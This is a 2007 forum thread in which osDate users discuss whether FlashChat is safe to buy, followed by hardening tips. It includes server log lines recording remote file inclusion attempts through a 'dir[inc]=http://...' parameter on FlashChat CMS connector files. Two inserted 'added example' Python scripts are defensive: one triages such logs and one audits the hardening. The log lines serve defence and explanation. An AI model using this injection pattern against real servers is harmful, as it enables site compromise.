View Full Version : Flashchat
burton
07-02-2007, 03:11 PM
I have posted this here as this is an enquiry and not an issue.
My enquiry is that as a new user to osdate v2.04 I am considering purchasing flashchat so that I can integrate it with osdate.
However, having read some of the issues that seem to have arisen in the flashchat-osdate forum, I would like to seek some answers/assurance before committing to a purchase of flashchat.
Firstly, I see that there is an issue with flash chat not recognising the osdate cms and that there is a file called osdateCMS.php to be installed, my question is, has that file now been updated into flashchat itself or do I have to download and add it in myself into flashchat once I have purchased flashchat?
Next up, I read that the flashchat install looks for the osdate config.php file in the root. What puzzles me is that I don't have a config.php file in my osdate directory, although I do have config.inc.php file. Can someone explain this for me?
Thanks in advance.
titan
07-02-2007, 04:28 PM
A bit of advice from a professional programmer : DON'T use Flashchat.
Sorry for Darren, I wish him all the income and best wishes, but having struggled with Flashchat, having been hacked. GODDAMN! It's just not worth it.
Go for this : http://www.userplane.com/
After this, make up your own mind. Tempting to use Flashchat, I know ... having been there. :rolleyes:
(If after using Flashchat your site gets hacked, worse : your server gets hacked : "BOO-BOO-WHOO!" :mad:, no pity from me)
burton
07-02-2007, 04:42 PM
I'm sorry to hear that you had a bad user experience with Flashchat, but I cannot help wondering, if your site was hacked into because of Flashchat:
a) Did you report back to Tufat, that your site was hacked and that you believe or had found the security vulnerability with Flashchat?
b) Was there any help and assistance from Tufat because of the security vulnerability you reported? After all the flashchat script is one that is purchased.
c) Was the security vulnerability patched up and was there notification of this via these forums to other users?
d) If the script still has security vulnerabilities, then wouldn't there be more users raising the alarm and therefore the script should at least carry warnings if not taken off sale?
I will look at userplane and make comparisons with flashchat.
Eric Karz
07-02-2007, 07:39 PM
Just a note that there is not anything out there that is 100%
not even Userplane
anything that has been reported here on the forum and to Darren has always had some type of fix (granted not overnight)
If you do decide to use flashchat and have any problems just post back here and or pm Darren directly
Another thing you could do is booby trap the parts of the chat folders that you do not want people to view access to :D
burton
07-03-2007, 06:11 AM
I hear what you are saying about the 'booby traps' Eric. Perhaps, you could share some info on this once I have purchased and installed flashchat.
I will indeed give Flashchat a go, because I have seen userplane and the demo of Flashchat, and in my opinion, Flashchat looks cleaner. Userplane definitely comes across as a top heavy 3rd party commercial application, and it seems to me to be a bit fussy.
Sisco
07-03-2007, 06:18 AM
Hello Sir,
I have a license for flashchat too and installed it for osdate for testing. The chat works fine and is easy to modify, if problems, Eric is somehow always one of the first to reply in the forum as well.
Just remember to toggle cms system during install at one of the first steps and choose osdate. Then second, you'd have to apply the link to chatadmin in admins panel manually.
Off you go, haven't had any problems yet. Experienced the chat running fast and slow, but I take it was my host as FTP and website ran slow too. :)
Besides, $5 isn't that bad for a night's hobby - You'd spend more going out with the mrs' ;)
regards,
sb0373
07-03-2007, 02:48 PM
Hi,
if you want to use flashchat for free, try this solution as posted here:
http://forum.tufat.com/showthread.php?t=37680
The idea is that you will also be able to increase the number of users on the chat server...
:)
burton
07-04-2007, 07:56 AM
> Hi,
> if you want to use flashchat for free, try this solution as posted here:
> http://forum.tufat.com/showthread.php?t=37680
> The idea is that you will also be able to increase the number of users on the chat server...
> :)
Nice offer, and tempting but I have to be honest and say, that seeing that I am only just starting out and tipping my toes into the water, so to speak, I would like to see something up and running first, before diving straight in.
Although, I shall monitor this with interest as I do believe it has great potential and carries benefit if quite a few sites join one chat host.
(however, I am wondering if your major bug would be the same usernames from different sites - and how this would be overcome as I wouldn't want any potential users from my site to experience any issues, where they connect to a 3rd party site)
In the meantime, Eric gimme some info on these "booby traps"
I have now installed flashchat, and I am looking at setting the chmods and .htaccess up correctly, any sound advice you can offer, would be most appreciated?
sb0373
07-04-2007, 02:23 PM
Well burton,
feel free to join anyways and see it in action. Not much effort needed on your side. Just copying 3 files into your chat directory. Then you can see it running the same way as if you would have installed it locally.
I do know how to overcome the "bug" and will implement it, when I have more sites on the system. The bug would only show up if 2 people with the same name are online at the same time.
titan
07-06-2007, 02:56 AM
> a) Did you report back to Tufat, that your site was hacked and that you believe or had found the security vulnerability with Flashchat?
The problem WAS Flashchat. Similar reportings on the forum of the same hacking. Also a solution which I quickly installed.
> b) Was there any help and assistance from Tufat because of the security vulnerability you reported? After all the flashchat script is one that is purchased.
Yes.
> c) Was the security vulnerability patched up and was there notification of this via these forums to other users?
Patch followed later. Since I am a professional programmer, I applied my own solution from the stuff I got from the website.
> d) If the script still has security vulnerabilities, then wouldn't there be more users raising the alarm and therefore the script should at least carry warnings if not taken off sale?
It's cheap, easy to install, and has some nice features. But having developed a professional view on Flashchat : as nice as it is, it just gives me shivers.
:rolleyes:
P.S. The thing is : they installed a file on my webserver, which I share with a couple hundred more websites. As I was quick to act, the wrongdoers didn't get time to abuse it. It was some Turkish group of Hackers. Ranting and raving about Palestine, Israel and shit.
After that, I kept a close eye on my server logs. Below is part of it :
/chat/inc/cmses/aedatingCMS.php 5648 2.831%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://freewebtown.... 1599 0.802%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://bhtvradio.co... 1057 0.530%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://88.84.140.10... 524 0.263%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.med.ualb... 369 0.185%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.tvorivas... 290 0.145%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.tvorivas... 285 0.143%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.bhtvradi... 254 0.127%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.2you2.de... 143 0.072%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.bhtvradi... 123 0.062%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.buuu.alt... 113 0.057%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.samasgil... 78 0.039%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.tvorivas... 70 0.035%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.tvorivas... 68 0.034%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://bhtvradio.co... 48 0.024%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://perqafohu.co... 47 0.024%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://kama.opensol... 41 0.021%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.rubatex.... 38 0.019%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kariwuhr... 34 0.017%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://contactoscon... 28 0.014%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://minng2.iespa... 25 0.013%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://version22.ie... 24 0.012%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.theaweso... 24 0.012%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sni-labs... 23 0.012%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://icezinhu.by.... 22 0.011%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://serv21.hosti... 20 0.010%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.freewebs... 20 0.010%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://servicioscon... 20 0.010%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.acuariop... 19 0.010%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.rubatex.... 19 0.010%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://bhtvradio.co... 18 0.009%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://pepedo.iespa... 18 0.009%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://humoreloco.i... 18 0.009%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://rugbyguide.c... 16 0.008%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.ces.karl... 14 0.007%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.dataeco.... 13 0.007%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://humoreloco.i... 13 0.007%
/themes/purple/style/images/right.gif 2990 1.499%
/admin/images/arrow_ltr.png 2726 1.366%
/chat/inc/cmses/aedating4CMS.php 2371 1.189%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://perqafohu.c... 516 0.259%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://br.geocitie... 424 0.213%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tvoriva... 305 0.153%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tvoriva... 289 0.145%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://65.254.61.5... 127 0.064%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tvoriva... 123 0.062%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.buuu.al... 95 0.048%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.tvoriva... 53 0.027%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.rubatex... 44 0.022%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://00e06b1.net... 40 0.020%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://wwop.org/cg... 38 0.019%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://61.19.55.25... 38 0.019%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://en.gov.ua/d... 35 0.018%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://caurusapulu... 35 0.018%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.allmir.... 26 0.013%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://minng2.iesp... 24 0.012%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://divertingne... 20 0.010%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://channels.da... 18 0.009%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://pepedo.iesp... 17 0.009%
Yes boys and girls, about 10.000 (!) hacking attempts.
WHO DOESN'T GET CYNICAL ABOUT THAT MANY HACK ATTACKS ON ONE'S SERVER!
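Added example (not part of the thread and not FlashChat code): a small Python triage script for a report in the "URL hits percent" layout posted above. It totals hits per script and parameter for requests whose query value is a remote URL, the `dir[inc]=http://...` pattern in that log, including URL-encoded variants. The sample rows and host names are constructed placeholders.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample rows in the "URL hits percent" layout of the report above.
# Hosts are placeholders under the reserved .invalid / .test TLDs.
SAMPLE_REPORT = """\
/chat/inc/cmses/aedatingCMS.php 5648 2.831%
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://host-a.invalid/x.txt? 1599 0.802%
/chat/inc/cmses/aedatingCMS.php?dir%5Binc%5D=http%3A%2F%2Fhost-b.test%2Fy 524 0.263%
/chat/inc/cmses/aedating4CMS.php?dir[inc]=ftp://host-c.invalid/z 127 0.064%
/themes/purple/style/images/right.gif 2990 1.499%
/search.php?next=/profile.php&ref=http 12 0.006%
"""

ROW = re.compile(r"^(?P<url>\S+)\s+(?P<hits>\d+)\s+(?P<pct>[\d.]+)%$")
REMOTE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def remote_include_params(url):
    """Return [(param, value)] for query parameters whose value is a remote URL."""
    query = urlsplit(url).query
    # parse_qsl percent-decodes keys and values, so encoded attempts are caught too.
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE.match(v.strip())]

def summarize(report):
    """Sum hits per (script path, parameter) for rows that carry a remote URL."""
    totals = Counter()
    for line in report.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # skip headers, blank lines and anything not in the layout
        path = urlsplit(m["url"]).path
        for param, _value in remote_include_params(m["url"]):
            totals[(path, param)] += int(m["hits"])
    return totals

if __name__ == "__main__":
    for (path, param), hits in summarize(SAMPLE_REPORT).most_common():
        print(f"{hits:6d}  {path}  param={param}")
```

Rows whose URL is cut off with "...", as in the report above, still match because only the start of the parameter value is inspected.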
burton
07-06-2007, 08:22 AM
Titan, thank you for the responses, I have carried out some global searches within the forum, and to my dismay, there doesn't seem to be any conclusive results which give advice on the security of flashchat.
I have looked for global chmod settings of flashchat.
I have looked for .htaccess info for flashchat.
I have also looked for hacking for flashchat, which returns many many pages with users who mention that they have been hacked. However, I have no idea if the fixes offered within the forum, have actually been implemented into flashchat?:confused:
I have identified a few users within the global forum, who seem to be knowledgeable with both osdate and flashchat, so I may well pester them for some info/advice.
Furthermore, one could spend all day and night going through the postings to find things out. I am left with the distinct impression it's a case of go with the flow, and if and when a security issue occurs, I should report back here to the forum and seek help/advice.
To which end, I have decided that I shall review flashchat within my site and decide how I want it to be used, then I shall come back to the forum and seek advice on what can be deleted from the server if it is not required and if it cannot be deleted what chmod setting instead. (or commenting out code within a file if applicable) and also what info I can be given on in respect to a .htaccess file within flashchat.
titan
07-06-2007, 11:28 AM
That seems like a logical and responsible approach ;)
Been about 3/4 of a year since I struggled with Flashchat, but here are some tips of mine which I remembered :
- above all else, disable the file sharing and uploading capabilities in Flashchat
- remove all but one file from the '/chat/inc/cmses/' directory, but keep the file you need to connect it to your CMS software (which is OsDate I take it?)
- I attached a ZIP file with the layouts I modified, to be placed in the layouts directory, and a httaccess file to be placed in the admin directory of Flashchat. You need to modify the httaccess file, in the line where it reads :
allow from XXXXXXXXXXXXXXX. Replace the XX's with your own IP. This will only make the admin directory accessible to yourself.
Well, my two cents. Best of luck
P.S. The layouts I added are for not showing the upload functions. Also : *alert* disable the functions in the config files (very important!)
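Added example (not part of the thread, and not the contents of the attached ZIP): a Python check that an installed chat directory follows two of the tips above, a single connector left in `inc/cmses/` and an `admin/.htaccess` whose `allow from` line is a real address and not the XXXX placeholder. The `deny from all` line, the `audit` and `build_sample` names and the sample tree are assumptions; the upload settings are not checked because the post does not name them.

```python
import re, tempfile
from pathlib import Path

ALLOW = re.compile(r"^\s*allow\s+from\s+(\S+)", re.I | re.M)
DENY_ALL = re.compile(r"^\s*deny\s+from\s+all\b", re.I | re.M)

def audit(chat_root, keep_cms="osdateCMS.php"):
    """Return a list of findings; an empty list means both checks passed."""
    root, findings = Path(chat_root), []
    # Only the CMS connector actually in use should remain in inc/cmses/.
    present = sorted(p.name for p in (root / "inc" / "cmses").glob("*.php"))
    if keep_cms not in present:
        findings.append(f"missing connector {keep_cms}")
    findings += [f"unused connector {n}" for n in present if n != keep_cms]
    # admin/.htaccess should deny everyone except one allowed address.
    ht = root / "admin" / ".htaccess"
    if not ht.is_file():
        return findings + ["admin/.htaccess missing"]
    text = ht.read_text()
    if not DENY_ALL.search(text):
        findings.append("admin/.htaccess has no 'deny from all'")
    sources = ALLOW.findall(text)
    if not sources:
        findings.append("admin/.htaccess has no 'allow from' line")
    for src in sources:
        # 'all' or an unedited XXXX placeholder restricts nothing useful.
        if src.lower() == "all" or set(src.upper()) == {"X"}:
            findings.append(f"admin/.htaccess allows '{src}'")
    return findings

def build_sample(root, hardened):
    """Create a constructed FlashChat-like tree for the demo (placeholder files)."""
    root = Path(root)
    cms = ["osdateCMS.php"] if hardened else ["osdateCMS.php", "aedatingCMS.php", "aedating4CMS.php"]
    (root / "inc" / "cmses").mkdir(parents=True)
    (root / "admin").mkdir()
    for name in cms:
        (root / "inc" / "cmses" / name).write_text("<?php // placeholder\n")
    allow = "192.0.2.10" if hardened else "XXXXXXXXXXXXXXX"  # documentation-range IP
    (root / "admin" / ".htaccess").write_text(f"order deny,allow\ndeny from all\nallow from {allow}\n")
    return root

if __name__ == "__main__":
    for hardened in (False, True):
        with tempfile.TemporaryDirectory() as d:
            print(hardened, audit(build_sample(Path(d) / "chat", hardened)))
```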
burton
07-08-2007, 01:45 PM
Titan, thanks for the help, it's much appreciated.
titan
07-08-2007, 03:29 PM
> Titan, thanks for the help, it's much appreciated.
Take care :D